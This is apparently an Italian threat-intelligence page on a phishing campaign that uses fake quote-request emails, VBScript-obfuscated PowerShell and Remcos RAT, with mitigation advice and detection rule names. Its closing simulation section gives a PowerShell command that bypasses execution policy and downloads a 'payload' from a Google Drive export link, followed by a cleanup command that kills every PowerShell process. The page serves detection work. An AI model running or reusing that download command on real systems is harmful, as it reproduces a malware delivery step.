Email di Richiesta di Preventivo Falsi Usati in Attacchi di Phishing con Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Gli attori delle minacce stanno distribuendo email di phishing camuffate da richieste di preventivo per consegnare payload dannosi. La campagna usa VBScript per nascondere comandi PowerShell, che alla fine recuperano un payload a più stadi e Remcos RAT. Il malware finale supporta l’esecuzione remota di comandi, il keylogging e l’esfiltrazione di dati dai sistemi compromessi.
Indagine
Il Centro di Sicurezza di AhnLab (ASEC) ha identificato una campagna di phishing in cui gli archivi compressi contengono VBScripts nascosti. I ricercatori hanno scoperto un metodo di offuscamento che sfrutta notepad.exe per ricostruire il nome eseguibile ‘powershell’ e si basa sulla sostituzione di stringhe basata su token per i comandi PowerShell. Il payload a più stadi sfrutta anche oggetti COM per eseguire l’aggiramento UAC.
Mitigazione
Gli utenti dovrebbero convalidare il dominio dell’email del mittente e rimanere cauti quando aprono allegati o collegamenti inaspettati. Le organizzazioni dovrebbero configurare un filtro email per bloccare le estensioni di file sospette come .vbs, .exe e .js. Gli utenti dovrebbero anche evitare di inserire credenziali sensibili su URL non ufficiali o sospetti ricevuti tramite email non richieste.
Risposta
Quando viene rilevata un’attività dannosa, verificare la legittimità dell’email originale e indagare sull’attività sospetta dei file all’interno di %APPDATA%. Controllare l’esecuzione di PowerShell non autorizzata e gli indicatori associati a Remcos RAT. Isolare i sistemi compromessi dalla rete per prevenire ulteriori comunicazioni C2, attività laterali e potenziali esfiltrazioni di dati.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
LOLBAS WScript / CScript (tramite process_creation)
Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (tramite dns_query)
Possibile Infiltrazione / Esfiltrazione di Dati / C2 tramite Servizi / Strumenti di Terze Parti (tramite dns)
IOC (HashMd5) per rilevare: Phishing/Truffa Malware: Attenzione alle email di phishing camuffate da richieste di preventivo
IOC (SourceIP) per rilevare: Phishing/Truffa Malware: Attenzione alle email di phishing camuffate da richieste di preventivo
IOC (DestinationIP) per rilevare: Phishing/Truffa Malware: Attenzione alle email di phishing camuffate da richieste di preventivo
Rilevare Script PowerShell che si connette al Server C2 [Connessione di Rete Windows]
Esecuzione PowerShell dannosa tramite Offuscamento VBScript [Windows PowerShell]
Esecuzione Simulazione
-
Narrazione & Comandi di Attacco: Un attaccante invia un’email di spearphishing contenente un link a un documento. Quando l’utente clicca sul link, esegue un comando PowerShell nascosto progettato per estrarre uno script dannoso da un repository Google Drive. L’attaccante usa il
parametro export=downloadper garantire che il file venga scaricato direttamente anziché visualizzato in un browser. L’obiettivo è eseguire un payload senza file in memoria per evitare gli antivirus basati su disco. Il comando è costruito per attivare la regola di rilevamento specifica che mira a questo modello di download. -
Script di Test di Regressione:
# Simulazione del download di un file tramite PowerShell da Google Drive tramite modello URL specifico $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J" Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Scaricando payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`"" -
Comandi di Pulizia:
# Nessun file viene scritto su disco in questa simulazione specifica, # ma fermiamo il processo se è ancora in esecuzione. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue